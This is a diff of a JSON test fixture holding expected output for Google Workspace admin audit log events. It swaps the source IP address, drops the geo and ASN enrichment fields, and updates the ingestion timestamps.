+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_APPLICATION\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"APPLICATION_ENABLED\",\"value\":\"app enabled\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}",
 "provider": "admin",
 "action": "ADD_APPLICATION",
 "id": "1",
@@ -174,7 +138,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -198,35 +162,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:20.091164600Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_APPLICATION_TO_WHITELIST\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}",
+ "ingested": "2021-12-09T13:38:31.915767800Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_APPLICATION_TO_WHITELIST\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}",
 "provider": "admin",
 "action": "ADD_APPLICATION_TO_WHITELIST",
 "id": "1",
@@ -256,7 +202,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -280,35 +226,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091167500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ADVERTISEMENT_OPTION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915773500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ADVERTISEMENT_OPTION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_ADVERTISEMENT_OPTION", "id": "1", @@ -338,7 +266,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -362,35 +290,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091170400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_ALERT\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}", + "ingested": "2021-12-09T13:38:31.915778400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_ALERT\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}", "provider": "admin", "action": "CREATE_ALERT", "id": "1", @@ -420,7 +330,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -444,35 +354,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091173100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ALERT_CRITERIA\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}", + "ingested": "2021-12-09T13:38:31.915782300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ALERT_CRITERIA\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}", "provider": "admin", "action": "CHANGE_ALERT_CRITERIA", "id": "1", @@ -502,7 +394,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -526,35 +418,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091175800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_ALERT\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}", + "ingested": "2021-12-09T13:38:31.915787Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_ALERT\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"}]}}", "provider": "admin", "action": "DELETE_ALERT", "id": "1", @@ -584,7 +458,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -608,35 +482,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091178600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ALERT_RECEIVERS_CHANGED\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915790700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ALERT_RECEIVERS_CHANGED\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ALERT_RECEIVERS_CHANGED", "id": "1", @@ -666,7 +522,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -688,35 +544,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091181400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RENAME_ALERT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915795200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RENAME_ALERT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "RENAME_ALERT", "id": "1", @@ -746,7 +584,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -770,35 +608,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091184100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ALERT_STATUS_CHANGED\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915799500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ALERT_STATUS_CHANGED\",\"parameters\":[{\"name\":\"ALERT_NAME\",\"value\":\"alert name\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ALERT_STATUS_CHANGED", "id": "1", @@ -828,7 +648,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -852,35 +672,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091186900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.915803800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "ADD_DOMAIN_ALIAS", "id": "1", @@ -910,7 +712,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -934,35 +736,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091190Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.915807600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "REMOVE_DOMAIN_ALIAS", "id": "1", @@ -992,7 +776,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1016,35 +800,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091192700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"SKIP_DOMAIN_ALIAS_MX\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.915812400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"SKIP_DOMAIN_ALIAS_MX\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "SKIP_DOMAIN_ALIAS_MX", "id": "1", @@ -1074,7 +840,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1098,35 +864,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091195500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_DOMAIN_ALIAS_MX\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.915816300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_DOMAIN_ALIAS_MX\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "VERIFY_DOMAIN_ALIAS_MX", "id": "1", @@ -1156,7 +904,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1180,35 +928,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091198200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"DOMAIN_VERIFICATION_METHOD\",\"value\":\"ANALYTICS\"}]}}", + "ingested": "2021-12-09T13:38:31.915821100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"DOMAIN_VERIFICATION_METHOD\",\"value\":\"ANALYTICS\"}]}}", "provider": "admin", "action": "VERIFY_DOMAIN_ALIAS", "id": "1", @@ -1238,7 +968,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1262,35 +992,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091201Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OAUTH_ACCESS_TO_ALL_APIS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", + "ingested": "2021-12-09T13:38:31.915826900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OAUTH_ACCESS_TO_ALL_APIS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "TOGGLE_OAUTH_ACCESS_TO_ALL_APIS", "id": "1", @@ -1321,7 +1033,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
